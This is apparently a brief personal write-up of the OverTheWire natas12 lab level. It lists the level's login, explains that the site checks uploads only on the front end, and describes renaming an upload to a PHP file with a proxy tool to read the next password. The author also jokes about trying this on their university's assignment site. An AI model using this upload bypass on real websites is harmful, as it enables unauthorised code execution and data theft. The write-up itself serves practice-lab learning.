How to pass:
Username: natas12
Password:KHZy1rDGIR3DBPUZKHZy1rfL
URL:http://natas12.natas.labs.overthewire.org/
Tips can be uploaded images, the maximum does not exceed 1kB, click Viewsourcecode to view the source code, the key code is as follows:
By reading the code, you can find that in addition to limiting the file size and file extension to do the front-end restrictions, there is no detection of the file type. And it will return the path after uploading, so we can just upload a php file to read the natas13 password directly. I can change the filename suffix of the uploaded file by fiddler or other tools. (I use built suite for it!)
It’s funny. It’s very funny. If this changes the type of files I upload, maybe I can do something interesting with UNSW’s website when I upload my assignments …… Well this is certainly a joke (is it?)
That’s too easy, there’s no way a modern site could be so defenseless, I need to learn more in depth. It’s too late today, I have to go to a classmate’s birthday tomorrow. I’ll continue the day after tomorrow!
今朝有酒今朝醉 